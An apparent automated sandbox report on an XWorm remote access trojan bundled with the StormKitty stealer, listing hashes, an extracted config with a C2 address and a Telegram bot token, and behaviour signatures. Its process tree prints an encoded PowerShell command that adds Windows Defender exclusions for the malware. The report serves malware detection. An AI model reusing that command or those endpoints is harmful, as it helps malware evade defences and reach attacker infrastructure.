Analysis

  • max time kernel
    121s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    17-10-2024 01:32

General

  • Target

    5275e3db6276e5f0b85eff0c7b0282f56268646766b1566ba8f797e6ba2a9357.exe

  • Size

    1.3MB

  • MD5

    1b99f0bf9216a89b8320e63cbd18a292

  • SHA1

    6a199cb43cb4f808183918ddb6eadc760f7cb680

  • SHA256

    5275e3db6276e5f0b85eff0c7b0282f56268646766b1566ba8f797e6ba2a9357

  • SHA512

    02b7f410c6ccfd7d43159287424916a310b7e82c91cdb85eaeade16cf5614265a8bdcce8e6dcc2240ea54930cfb190f26ada3d5c926b50617a9826197f9cf382

  • SSDEEP

    24576:J64p16BppRskYGC/cJUE7P6nxhpBaTn+CC6YtGz:JzpEBrRb4MonrpATDcUz

Malware Config

Extracted

Family

xworm

Version

5.0

C2

104.219.239.11:6969

Mutex

QMHDjhLW52nOcp4a

Attributes
  • Install_directory

    %AppData%

  • install_file

    OneDrive.exe

  • telegram

    https://api.telegram.org/bot5372344229:AAEM46DF5hWBLPbN5UErJaoJvlNvm-ZJXyg

aes.plain

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 3 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5275e3db6276e5f0b85eff0c7b0282f56268646766b1566ba8f797e6ba2a9357.exe
    "C:\Users\Admin\AppData\Local\Temp\5275e3db6276e5f0b85eff0c7b0282f56268646766b1566ba8f797e6ba2a9357.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3052
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwANQAyADcANQBlADMAZABiADYAMgA3ADYAZQA1AGYAMABiADgANQBlAGYAZgAwAGMANwBiADAAMgA4ADIAZgA1ADYAMgA2ADgANgA0ADYANwA2ADYAYgAxADUANgA2AGIAYQA4AGYANwA5ADcAZQA2AGIAYQAyAGEAOQAzADUANwAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAA1ADIANwA1AGUAMwBkAGIANgAyADcANgBlADUAZgAwAGIAOAA1AGUAZgBmADAAYwA3AGIAMAAyADgAMgBmADUANgAyADYAOAA2ADQANgA3ADYANgBiADEANQA2ADYAYgBhADgAZgA3ADkANwBlADYAYgBhADIAYQA5ADMANQA3AC4AZQB4AGUAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAZABvAGMAdQBtAGUAbgB0AHMAXABPAG4AZQBEAHIAaQB2AGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAGQAbwBjAHUAbQBlAG4AdABzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUA
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4872
    • C:\Users\Admin\AppData\Local\Temp\wlawue.exe
      "C:\Users\Admin\AppData\Local\Temp\wlawue.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1240

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\wlawue.exe

    Filesize

    146KB

    MD5

    34fb99630bab94b3cbf92c1c6dec493f

    SHA1

    d6cc3d729e7971f7144f902d482f723ddd77cad8

    SHA256

    f2e2e2e4b066e98a05012853f4fabf37e04b9c5dc18d8341cc98b145f9a7f12a

    SHA512

    62bfc6a7fb0d895907da815859e7d118b16de33111210443a745b0cb9d11db82bd0531efef8503266c1269a037153794ea52bc2ce70a127389fce0e5ac4d9fcf

  • memory/1240-1102-0x0000000000C00000-0x0000000000C2A000-memory.dmp

    Filesize

    168KB

  • memory/3052-35-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-17-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-0-0x000007FEF5EF3000-0x000007FEF5EF4000-memory.dmp

    Filesize

    4KB

  • memory/3052-11-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-33-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-15-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-13-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-19-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-9-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-7-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-5-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-26-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-63-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-65-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-67-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-61-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-59-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-57-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-55-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-53-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-51-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-49-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-47-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-45-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-31-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-41-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-39-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-37-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-4-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-3-0x000007FEF5EF0000-0x000007FEF68DC000-memory.dmp

    Filesize

    9.9MB

  • memory/3052-44-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-29-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-28-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-23-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-21-0x000000001B210000-0x000000001B311000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-1078-0x000007FEF5EF0000-0x000007FEF68DC000-memory.dmp

    Filesize

    9.9MB

  • memory/3052-1079-0x0000000000900000-0x0000000000980000-memory.dmp

    Filesize

    512KB

  • memory/3052-1080-0x0000000000AC0000-0x0000000000B0C000-memory.dmp

    Filesize

    304KB

  • memory/3052-1081-0x000007FEF5EF3000-0x000007FEF5EF4000-memory.dmp

    Filesize

    4KB

  • memory/3052-1082-0x000007FEF5EF0000-0x000007FEF68DC000-memory.dmp

    Filesize

    9.9MB

  • memory/3052-1084-0x000007FEF5EF0000-0x000007FEF68DC000-memory.dmp

    Filesize

    9.9MB

  • memory/3052-1112-0x000000001C940000-0x000000001C956000-memory.dmp

    Filesize

    88KB

  • memory/3052-1107-0x000000001C530000-0x000000001C578000-memory.dmp

    Filesize

    288KB

  • memory/3052-1091-0x0000000002980000-0x00000000029D4000-memory.dmp

    Filesize

    336KB

  • memory/3052-1095-0x000000001B750000-0x000000001B77C000-memory.dmp

    Filesize

    176KB

  • memory/3052-1096-0x000007FEF5EF0000-0x000007FEF68DC000-memory.dmp

    Filesize

    9.9MB

  • memory/3052-2-0x000000001B210000-0x000000001B316000-memory.dmp

    Filesize

    1.0MB

  • memory/3052-1-0x0000000000E50000-0x0000000000F9A000-memory.dmp

    Filesize

    1.3MB

  • memory/3052-1104-0x000000001C200000-0x000000001C20E000-memory.dmp

    Filesize

    56KB

  • memory/3052-1103-0x000000001C2B0000-0x000000001C3D0000-memory.dmp

    Filesize

    1.1MB

  • memory/3052-1105-0x00000000230C0000-0x00000000233A2000-memory.dmp

    Filesize

    2.9MB

  • memory/3052-1106-0x000000001C4F0000-0x000000001C50C000-memory.dmp

    Filesize

    112KB

  • memory/3052-1108-0x000000001C580000-0x000000001C588000-memory.dmp

    Filesize

    32KB

  • memory/3052-1109-0x000000001D0E0000-0x000000001D186000-memory.dmp

    Filesize

    664KB

  • memory/3052-1111-0x000000001DED0000-0x000000001DF1A000-memory.dmp

    Filesize

    296KB

  • memory/3052-1110-0x000000001C590000-0x000000001C5C4000-memory.dmp

    Filesize

    208KB

  • memory/4872-1090-0x0000000001E60000-0x0000000001E68000-memory.dmp

    Filesize

    32KB

  • memory/4872-1089-0x000000001B200000-0x000000001B4E2000-memory.dmp

    Filesize

    2.9MB